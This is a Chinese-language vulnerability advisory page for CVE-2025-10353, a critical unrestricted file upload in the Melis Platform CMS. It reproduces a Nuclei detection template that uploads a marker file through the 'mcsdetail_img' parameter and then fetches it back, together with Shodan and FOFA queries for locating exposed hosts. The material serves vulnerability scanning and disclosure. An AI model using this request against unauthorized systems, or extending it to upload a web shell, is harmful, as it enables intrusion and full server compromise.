CVE-2025-10353: Melis Technology Melis Platform - Unrestricted File Upload & Remote Code Execution

日期: 2026-02-05 | 影响软件: Melis Technology Melis Platform | POC: 已公开

漏洞描述

Melis Technology Melis Platform contains an unrestricted file upload caused by insufficient validation of 'mcsdetail_img' parameter in /melis/MelisCmsSlider/MelisCmsSliderDetails/saveDetailsForm, letting attackers upload malicious files and achieve remote code execution, exploit requires crafted POST request.

PoC代码[已公开]

id: CVE-2025-10353

info:
  name: Melis Technology Melis Platform - Unrestricted File Upload & Remote Code Execution
  author: ohmygod20260203
  severity: critical
  description: |
    Melis Technology Melis Platform contains an unrestricted file upload caused by insufficient validation of 'mcsdetail_img' parameter in /melis/MelisCmsSlider/MelisCmsSliderDetails/saveDetailsForm, letting attackers upload malicious files and achieve remote code execution, exploit requires crafted POST request.
  impact: |
    Attackers can upload malicious files leading to remote code execution and full system compromise.
  remediation: |
    Update to the latest version with the vulnerability fixed.
  reference:
    - https://github.com/ivansmc00/CVE-2025-10353-POC
    - https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-melis-platform
    - https://nvd.nist.gov/vuln/detail/CVE-2025-10353
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-10353
    cwe-id: CWE-434
  metadata:
    verified: true
    max-request: 2
    shodan-query: http.html:"/melis/MelisCms"
    fofa-query: body="/melis/MelisCms" || body="MelisDemoCms"
    product: melis-platform
    vendor: melis-technology
  tags: cve,cve2025,melis,cms,file-upload,rce,intrusive

variables:
  rand: "{{to_lower(rand_text_alpha(5))}}"
  filename: "{{rand}}.txt"
  payload: "CVE-2025-10353-{{rand}}"

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /melis/MelisCmsSlider/MelisCmsSliderDetails/saveDetailsForm HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----{{rand}}

        ------{{rand}}
        Content-Disposition: form-data; name="mcsdetail_mcslider_id"

        0
        ------{{rand}}
        Content-Disposition: form-data; name="mcsdetail_img"; filename="{{filename}}"
        Content-Type: text/plain

        {{payload}}
        ------{{rand}}--

    matchers:
      - type: dsl
        internal: true
        dsl:
          - 'status_code == 200'
          - 'contains(body, "success") || contains(body, "uploaded")'
        condition: and

  - raw:
      - |
        GET /media/sliders/0/{{filename}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, payload)'
        condition: and

    extractors:
      - type: dsl
        dsl:
          - 'host + "/media/sliders/0/" + filename'
# digest: 4a0a0047304502201dbfa2abe16dfbcf7ecc1f627218b19c917d2d076a3560a0093198772b5c2d67022100e17de475daf3d09a6a8469318d69fbb0d959f5d8132cac2487282af3154ec50d:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2025/CVE-2025-10353.yaml

相关漏洞推荐